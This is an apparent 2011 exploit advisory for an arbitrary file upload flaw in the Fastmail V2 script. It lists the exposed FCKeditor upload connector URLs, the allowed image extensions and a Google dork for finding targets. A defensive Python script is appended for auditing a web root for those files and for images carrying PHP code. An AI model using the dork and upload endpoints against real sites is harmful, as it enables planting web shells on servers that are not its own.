Fastmail 2 Shell Upload

2011.08.10
Credit: Net.Edit0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Info=================================================================
[-] Title : Fastmail V.2 Script Arbitrary File Upload Vulnerability
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Website : 1337day.com
[-] Vendor: http://fastemail.ir/
[-] Software Link: http://dl.webalfa.net/files/FastMail_V2-(www.webalfa.ir).zip
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 10/08/2011
[-] Google Dork : "powered by fastmail ver 2.0"
[-] Category : webapps / 0day
[-] Special Thanks : Amir-Magic ~ cyrus ~ Mikili ~ b3hz4d

[+] Exploit===============================================================
[-] uploader :)
# http://[localhost]/FCKeditor/editor/filemanager/upload/php/upload.php
# http://[localhost]/FCKeditor/editor/filemanager/upload/test.html
[-] Upload Testing !
# Allow extension : "jpg','gif','jpeg','png"
^_^ G00d LUCK ALL :=)

[+] Greets===================================================================+
+ DarkCoder, Dr.Niloo, Hurr!c4nE , hossin , _Attack_, D3adlY, 3H34N , Tre0r
+ s3cure.p0rt, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x
+ h4ckcity.org, pentesters.ir, mn-team.net [PersianGulf F0r Ever]
+ <3 I Love You iRAN Far==>D <3
+
+ =============================================================================+
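For administrators checking their own installation, the following is an added example (not part of the original advisory or the Fastmail code) that walks a local web root, reports whether the two FCKeditor upload files named above are present, and flags files carrying one of the allowed image extensions whose content is not a real image or contains a PHP open tag. The `UserFiles` directory, the sample file contents and the `<?php` marker check are assumptions constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path

# Relative paths named in the advisory's exploit section.
CONNECTOR_PATHS = (
    "FCKeditor/editor/filemanager/upload/php/upload.php",
    "FCKeditor/editor/filemanager/upload/test.html",
)
# Extensions the advisory lists as allowed by the uploader.
IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png"}
# Leading bytes of genuine JPEG, GIF and PNG files.
MAGIC = (b"\xff\xd8\xff", b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n")


def audit_webroot(webroot):
    """Return (exposed_connectors, suspicious_images) found under webroot."""
    exposed, suspicious = [], []
    suffixes = tuple(p.lower() for p in CONNECTOR_PATHS)
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            if rel.lower().endswith(suffixes):
                exposed.append(rel)  # upload connector or its test page
            elif os.path.splitext(name)[1].lower() in IMAGE_EXTS:
                with open(full, "rb") as fh:
                    data = fh.read(1 << 20)  # first 1 MiB is enough for triage
                # Assumption: an "image" with no image header, or with a
                # PHP open tag in it, deserves a manual look.
                if not data.startswith(MAGIC) or b"<?php" in data:
                    suspicious.append(rel)
    return sorted(exposed), sorted(suspicious)


def demo():
    """Audit a constructed web root built in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample files, not real Fastmail content
            CONNECTOR_PATHS[0]: b"<?php /* connector stub */ ?>",
            CONNECTOR_PATHS[1]: b"<html>upload test page</html>",
            "UserFiles/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
            "UserFiles/photo.jpg": b"<?php echo 'not an image'; ?>",
        }
        for rel, body in samples.items():
            path = Path(root, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(body)
        return audit_webroot(root)
```

Call `audit_webroot()` with the server's document root; any entry in the first list means the upload connector or its test page is still deployed.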

